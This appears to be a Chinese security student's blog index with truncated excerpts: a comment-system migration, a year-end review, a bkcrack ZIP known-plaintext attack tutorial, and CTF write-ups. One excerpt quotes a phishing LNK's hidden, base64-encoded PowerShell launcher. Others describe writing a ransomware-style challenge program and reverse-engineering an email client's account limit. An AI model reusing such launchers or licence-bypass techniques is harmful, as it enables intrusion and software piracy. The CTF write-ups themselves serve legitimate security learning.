从 Valine 迁移到 Waline 全记录
起因是看到了 Leancloud 要跑路了
src: 关于 LeanCloud 停止对外提供服务的通知 | LeanCloud 开发者文档
因为我的评论系统 Valine 的数据是用了 Leancloud 作为存储数据库的,Leancloud 这一跑路,我的评论就没法玩了,所以我要找替代方案
虽然我对 Waline 具有一定的偏见(指之前有人刷评论推荐 Waline,然后当时很多用 Valine 的网站都中招了,至今还不知道是谁干的),但是不可否认的是它对 Valine 的数据兼容很优秀,所以想了一下我还是决定迁移到 Waline
导出数据这个其实很简单,因为 Leancloud 直接给了导出数据的方式,直接在 Leancloud 自己的后台导出就行
导出后查看一下数据的格式,看到是 jsonl 文件
12#filetype:JSON-streaming {"type":"Class","class":"Comment"}{"nick":" ...
记一次对某邮箱软件账户数量上限破解
本文仅做技术交流,请支持正版软件
前言邮件这个东西对我来说一直很重要,我最开始用的是巨硬的那个邮件 UWP 客户端,那个是真的好用,但是耐不住巨硬要推他那个 Outlook New,然后邮件 UWP 就死翘翘了
之前我找到一家厂子的邮件客户端很好用,但是它限制普通用户只能有 10 个邮箱账户,我自己的邮箱都不止十个了,这哪里够用,然后我就转战了 DreamMail
但是 DreamMail 我近期发现有些邮件它看不了(体现为邮件内容全白),并且这个客户端存在编码问题,会导致邮件内容显示出问题
于是我就又尝试用回了某厂的这个邮箱软件,但是限制 10 个账户咋办嘛,那就只能发挥我只学了一点点的逆向技术去改一改了
本文旨在记录我逆向研究的过程,请支持正版软件
破解过程本次用到的客户端版本是某厂的 5.4.2.1011 版本,这个算是一个比较老的版本了
安装软件这点倒没啥好说的,勾选同意各种协议即可
因为我以前的数据是在的,所以安装完打开就告诉我登录邮箱达到上限了
定位限制所在位置先看看这个程序是什么东西写的,打开目录发现本体才几百 K,有个版本号目录,点进去发现有 Qt 组件 ...
2025 年终总结
前言因为之前刷工作室大佬 unk 的博客,发现有那么一个年终总结,考虑到 24 年才刚加入工作室,也没啥好总结的。但 25 年不一样,参加了一些比赛,有了一定的成绩。
现在是 2025 年 12 月 31 日凌晨 1 点左右(跑 hexo new 的时候是 1:10),是一个在前一天九点钟跟一群兄弟出去吃海底捞后回来因为没有热水所以用热水壶煮了热水洗完澡的状态,可以来做一个总结了。
学习学习方面,也是成功过了一个学年了(2024-2025 学年),由于之前存在保研的想法,所以绩点说实话,还不错
最后在综评里面平均学分绩点为 3.7252,不算高,高不过那些真正在学习上很有成绩的大佬;不算低,比大多数人要高就是了。
我本身就是个数学苦手,两次高考数学一次 87 一次 86,是那种死学都只能学个半斤八两的
不过最终看下来,只能说数学拖了一点后腿,但不多,能接受吧
计算机基础课这一块还是可以的,虽然离散数学、数值分析啥的是我没学过的东西,但是最终看下来成绩不错
啥?你问我离散数学为啥只有 84?离散数学,那也是数学呀
再加上各种各样的奖项(2024-2025 学年的),也是成功险胜第二 ...
使用 bkcrack 对 ZipCrypto 加密的 ZIP 文件进行明文爆破
在经历了鹏城杯 2025 的各种 bkcrack 明文攻击后,我觉得我需要写一篇文章来汇总一下 bkcrack 这东西
bkcrack: https://github.com/kimci86/bkcrack/releases
如果你想更多地了解原理,可以阅读这篇论文,本文不讲原理
https://doi.org/10.1007/3-540-60590-8_12
先决条件加密方式ZIP 的加密算法常见的就两种,一个是 ZipCrypto,一个是 AES-256;根据压缩方式,有 Deflate 和 Store(不压缩)。为了能够使用 bkcrack 进行明文攻击,我们手上的加密压缩包必须是 ZipCrypto 加密,即
ZipCrypto Store
ZipCrypto Deflate(至少拥有一个完整明文,即完整文件)
这两个是可以进行明文攻击的
已知明文从我们的攻击方式「明文攻击」就知道,我们必须知道一部分明文才能够对文件进行攻击。
根据论文,我们需要知道密文中已知至少 12 字节的明文,才能够对压缩包进行攻击操作
实测上,貌似 12 字节也不是必须的,10 字节也出 ...
2025 第五届“鹏城杯”联邦网络靶场协同攻防演练(初赛)个人 Writeup
我先燃尽了,四次 bkcrack,出题人是真喜欢这东西啊
还有一堆散点杂色像素图,看的眼睛都要瞎啦
您每题的图片都要藏那么点东西是吗
本次的 PCB 我负责的是 Misc 部分(毕竟我们队里三个搞 Web 的,不如放给那两个经验丰富的 Web 手来搞,我还是回归我擅长的 Misc 领域吧,Web 转 Misc 这块),所以下面我会讲一讲 Misc 部分我的思路,解出来了的题目会标记 Solved 的
下面放一下战况
time | Solved题目上来就给了个 ELF 文件
nc 给出的服务器,会给出 base64 编码后的 zip 文件数据流,并询问现在几点
解压出来发现图片,就是个时钟
因为 OpenCV 的识别率不高,且考虑到只有 12 种情况,所以用建哈希表的玩法
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152import base64import sysfrom pwn import remote, contextfrom ...
ADCTF 2025 个人出题记录
ADCTF2025 所有题目源码及选手 Writeup:https://github.com/GDUT-ADSec/ADCTF2025
ADCTF2025 所有本人出的题目源码:https://github.com/GDUTMeow-Challenges/ADCTF2025-Challenges
ForensicDangerous Worm
题目仓库:https://github.com/GDUTMeow-Challenges/Challenge-Dangerous-Worm
出这道内存取证主要是在羊城杯里面做到了一题你也是旮旯给木大师?,那个题目是病毒分析+内存取证,给了我启发,于是我也决定出这么一题来玩玩。
编写病毒首先是怎么编写病毒,我的本身就是用 AES-CBC 只加密部分文件,然后再把密钥保存到电脑里头,向量用程序自身的
于是就简单的写了一个加密用户桌面等文件夹的一个病毒程序(源码在仓库里可以去看),顺带加了个防呆设计(避免我自己运行了病毒)
123456def main(): # 安全起见,获取计算机名称 PC_NAME = os.getenv(&qu ...
2025 羊城杯决赛个人做题思路 Writeup
本次羊城杯比赛主要分为了三个部分:综合渗透、应急响应、数据安全,而在比赛中我主要负责的是应急响应和数据安全部分
综合渗透和应急响应是有交叉的,所以我会丢在一起讲
数据安全本次我做的是数据安全的第二到第四题,第一题用 AI 梭了,但是有问题,后面队友补充了,我这里讲一下后面三道题目吧
交完最后一个 DS4 也是美美暂时做到了第一的宝座
DS2
本题考点为数据脱敏,选手需要通过 SSH(端口10222)连接环境,修改现有 PHP 接口代码(api.php),使其在读取数据库表单中包含敏感信息时,自动进行脱敏输出。完成后访问 Check 服务进行检测,Check 通过即可获得 FLAG。
接口文件:api.php 判定标准: 返回数据中,敏感数字字段进行脱敏格式处理,并且不能修改原数据。
其余字段(uuid, username, email, gender, age 等)与数据库一致。
给了 api.php,实际上重点在下面查询数据库并输出的地方
123456789101112131415161718192021222324252627282930313233343536373839 ...
2025 湾区杯决赛(AKA 珠海旅行记录)
本次也是非常幸运的,在候补名单里面进了 GBACC 的决赛
因为得到消息的时候,是周四,我们下周一就要打决赛了,所以光速定了酒店和过去的高铁票
同样,因为是决赛,所以很可能就会变成我们的公费旅游环节,比赛的东西我会放到最后的
旅游比赛前日——出发
我们是周六去的珠海,当天早上买的 10:14 的票从南站出发去的,第一次坐到有这样的桌子的高铁
我们总共两个队伍去,在我们没有商量的情况下,我们甚至买的同一班高铁(笑哭)
到了以后,我们先去酒店办理入住,但是因为我们来的太早了,实在是没有清理好的客房,于是让我们做了个登记,我们就去吃午餐了
在附近的广场吃完午餐,就去赛场先签到了
比赛前日——签到比赛场馆是珠海国际会展中心,这个地方说实话,是真的大啊~~~
给你们看张酒店拍的图,感受一下(对面是澳门)
反正一路上走,看到很多湾区杯的牌牌,想着跟着走准没错,结果走了快20分钟才到那个门口(问就是找错门了)
首先在门口看到的,就是两个大牌牌
然后我们一路坐电梯上到4楼(这栋建筑只有1楼和4楼),找到签到处,签了个到,领取了我们的物资
其实我们第一次来的时候,来太早了,他们没上班,我们在 ...
【Volcania】2025 湾区杯初赛 Writeup
Miscbademail | 未解出
我收到了来自hr的邮件,当我打开附件的时候一个黑框一闪而过,我立刻上报了IT部门,于是他们拿走了我的硬盘。
给的是一个 RAID0 的文件,直接 R-Studio 读取就行,从 Thunderbird 的数据目录可以得到 INBOX 收件箱
这里面的最后一封邮件就是所谓的HR邮件
邮件内有
12From: =?GBK?B?wfW378P5?= <[email protected]>Return-Path: [email protected]
发件和回执地址相同,可以认为是真实发件邮箱
把附件拿出来,按照规定的密码解压,发现是一个 lnk 文件,实际执行的是
1C:\Windows\System32\cmd.exe /c powershell.exe -w hidden -enc "JJAB6AGQAPQAgAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuADsAJABjAGEAcABlAD0AIAAiACQAegBkAFwAVm5XU9h+pmgJZ1CWbFH4U6F7BnTEiZpbLg ...
【Volcania】LilCTF2025 Writeup
WebEkko Note数据库关系如下
通过这里的注释,可以猜到题目大概与random伪随机有关系,如果拿到seed,就可以预测random生成的随机值
1234# 欸我艹这两行代码测试用的忘记删了,欸算了都发布了,我们都在用力地活着,跟我的下班说去吧。# 反正整个程序没有一个地方用到random库。应该没有什么问题。import randomrandom.seed(SERVER_START_TIME)
题目提到的 RCE 相关代码
[email protected]('/execute_command', methods=['GET', 'POST'])@login_requireddef execute_command(): result = check_time_api() if result is None: flash("API死了啦,都你害的啦。", "danger") return redi ...